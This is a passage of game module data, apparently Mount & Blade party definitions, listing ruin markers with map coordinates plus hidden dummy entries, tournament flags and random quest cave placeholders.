("ruin_15", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.6, -285.68), []),
("ruin_16", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (728.0, -576.0), []),
("ruin_17", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (324.0, -168.0), []),
("ruin_18", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (205.88, -297.56), []),
("ruin_19", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (270.24, -145.66), []),
("ruin_20", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1045.2, -189.6), []),
("ruin_21", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.0, -24.0), []),
("ruin_22", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1407.8, -147.36), []),
("ruin_23", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1197.2, 39.6), []),
("ruin_24", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (659.16, -625.0), []),
("ruin_25", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1025.28, 161.92), []),
("ruin_26", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1022.84, 372.52), []),
("ruin_27", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-635.2, 134.0), []),
("ruin_28", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-156.6, -65.52), []),
("ruin_29", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.72, -95.0), []),
("ruin_30", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-895.24, 103.12), []),
("ruin_31", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1240.0, -119.2), []),
("ruin_32", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1015.2, -161.6), []),
("ruin_33", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-964.9, -115.64), []),
("ruin_34", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1423.8, 516.72), []),
("ruin_35", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1158.32, -140.28), []),
("ruin_36", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (279.68, 107.16), []),
("ruin_37", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-113.1, 20.28), []),
("ruin_38", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.0, -152.0), []),
("ruin_39", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-102.6, -74.4), []),
("ruin_40", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-55.4, 440.0), []),
("ruin_41", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1093.48, -222.0), []),
("ruin_42", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1223.52, 250.64), []),
("ruin_43", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-762.4, -58.8), []),
("ruin_44", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-30.0, -160.8), []),
("ruin_45", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.0, -441.8), []),
("ruin_46", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1033.66, -183.48), []),
("ruin_47", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1016.48, 19.84), []),
("ruin_48", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1250.24, -123.56), []),
("ruin_49", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1198.24, -94.36), []),
("ruin_50", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1155.98, -102.8), []),
("ruin_51", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1149.92, -211.4), []),
("ruin_52", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-138.14, -244.58), []),
("ruin_53", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1155.2, -136.0), []),
("ruin_54", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.64, -65.2), []),
("ruin_55", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-788.96, -174.68), []),
("ruin_56", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.28, -95.76), []),
("ruin_57", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-903.6, -58.72), []),
("ruin_58", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.8, -118.8), []),
("ruin_59", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-896.0, -76.4), []),
("ruin_60", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1056.0, -8.0), []),
("ruin_61", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1154.72, -125.16), []),
("ruin_62", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1253.6, -116.0), []),
("ruin_63", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1160.62, -154.06), []),
("ruin_64", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.2, -286.8), []),
("ruin_65", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-790.0, -318.8), []),
("ruin_66", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.12, -21.64), []),
("ruin_67", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1287.12, -123.0), []),
("ruin_68", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1169.84, -130.0), []),
("ruin_69", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-622.36, -32.4), []),
("ruin_70", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-654.88, 165.88), []),
("ruin_71", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-651.2, 164.8), []),
("ruin_72", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-614.96, 11.36), []),
("ruin_73", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-589.88, 42.92), []),
("ruin_74", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-594.8, 86.4), []),
("ruin_75", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-698.64, -5.68), []),
("ruin_76", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-713.04, 42.12), []),
("ruin_77", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1073.12, 158.88), []),
("ruin_78", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.0, 140.6), []),
("ruin_79", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-975.4, 316.94), []),
("ruin_80", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-869.2, 94.4), []),
("ruin_81", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-976.56, 317.44), []),
("ruin_82", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-954.0, 88.4), []),
("ruin_83", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1381.2, 417.2), []),
("ruin_84", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.4, 406.8), []),
("ruin_85", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1010.0, 498.8), []),
("ruin_86", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1199.2, 498.0), []),
("ruin_87", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1411.6, 589.04), []),
("ruin_88", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (179.6, -131.4), []),
("ruin_89", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (306.0, 71.6), []),
("ruin_90", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.28, -15.08), []),
("ruin_91", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (121.4, -145.88), []),
("ruin_92", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-9.28, -95.0), []),
("ruin_93", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (76.04, -92.96), []),
("ruin_94", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (289.36, -104.98), []),
("ruin_95", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-139.32, 74.88), []),
("ruin_96", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.0, -141.6), []),
("ruin_97", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-204.4, 277.44), []),
("ruin_98", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-68.0, 500.4), []),
("ruin_99", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-177.2, 270.8), []),
("ruin_100", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.8, -17.2), []),
("ruin_101", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (229.64, 85.82), []),
("ruin_102", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.4, 424.68), []),
("ruin_103", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-69.6, 510.4), []),
("ruin_104", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.4, 50.4), []),
("ruin_105", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-183.76, -29.36), []),
("ruin_106", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-167.6, -92.44), []),
("ruin_107", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-391.04, 8.0), []),
("ruin_108", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-407.48, -53.48), []),
("ruin_109", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-285.2, -113.52), []),
("ruin_110", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-132.4, -119.26), []),
("ruin_111", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-309.08, -182.32), []),
("ruin_112", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-372.92, -148.16), []),
("ruin_113", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-237.08, -130.08), []),
("ruin_114", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-361.8, 119.48), []),
("ruin_115", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1212.0, 65.36), []),
("ruin_116", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1311.6, 62.0), []),
("ruin_117", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (894.12, 193.44), []),
("ruin_118", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (908.92, 188.64), []),
("ruin_119", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1406.0, -136.0), []),
("ruin_120", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1073.28, 331.92), []),
("ruin_121", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (963.12, 635.36), []),
("ruin_122", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1291.0, 39.44), []),
("ruin_123", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (799.76, -626.6), []),
("ruin_124", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1056.0, 380.8), []),
("ruin_125", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1200.0, 99.6), []),
("ruin_126", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1405.6, -152.0), []),
("ruin_127", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1059.8, 213.88), []),
("ruin_128", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (694.0, 322.8), []),
("ruin_129", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1057.6, 44.0), []),
("ruin_130", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1079.6, 344.8), []),
("ruin_131", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (942.4, 472.0), []),
("ruin_132", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1180.0, 188.0), []),
("ruin_133", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1438.0, -298.0), []),
("ruin_134", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1205.2, 105.6), []),
("ruin_135", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (154.0, -531.04), []),
("ruin_136", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-39.92, -494.08), []),
("ruin_137", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.0, -414.8), []),
("ruin_138", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (111.0, -424.56), []),
("ruin_139", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-503.46, -178.48), []),
("ruin_140", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-596.0, -232.8), []),
("ruin_141", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-406.2, -159.8), []),
("ruin_142", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-515.2, -233.0), []),
("ruin_143", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1156.56, -509.16), []),
("ruin_144", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-701.44, -317.04), []),
("ruin_145", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1266.0, -258.0), []),
("ruin_146", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (965.84, 554.88), []),
("ruin_147", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-156.68, -77.84), []),
("ruin_148", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.6, -144.16), []),
("ruin_149", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-244.68, -138.56), []),
("ruin_150", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1015.32, -66.2), []),
("ruin_151", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.26, -121.1), []),
("ruin_152", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1259.36, -125.88), []),
("ruin_153", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1174.52, -118.44), []),
("ruin_154", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-18.08, -168.52), []),
("ruin_155", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (56.88, -199.68), []),
("ruin_156", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.48, -109.4), []),
("ruin_157", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-196.96, -143.08), []),
("ruin_158", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-28.36, -152.0), []),
("ruin_159", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.84, -159.2), []),
("ruin_160", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.0, -296.56), []),
("ruin_161", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.64, -167.2), []),
("ruin_162", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-57.76, -203.0), []),
("ruin_163", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1143.6, -182.2), []),
("ruin_164", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-201.32, 6.6), []),
("ruin_165", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-15.6, -329.16), []),
("ruin_166", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-234.32, -169.8), []),
("ruin_167", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-986.84, -72.8), []),
("ruin_168", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (180.84, -311.12), []),
("ruin_169", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-172.72, -116.28), []),
("ruin_170", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-534.16, -224.32), []),
("ruin_171", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1010.48, -116.08), []),
("ruin_end", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (36.0, 36.0), []),
("ruin_dummy_1", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_2", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_3", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_4", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_5", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("attack_target", " ", icon_attack_target|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("defence_target", " ", icon_defence_target|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_1", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_2", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_3", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_4", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_5", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_6", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_7", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tournament_flag_8", " ", icon_tournament_flag|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_01", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_02", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_03", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_04", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_05", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_06", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_07", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_08", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_09", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_10", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_11", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_12", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("rand_quest_cave_13", " ", icon_point_mark|pf_disabled|pf_is_static|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
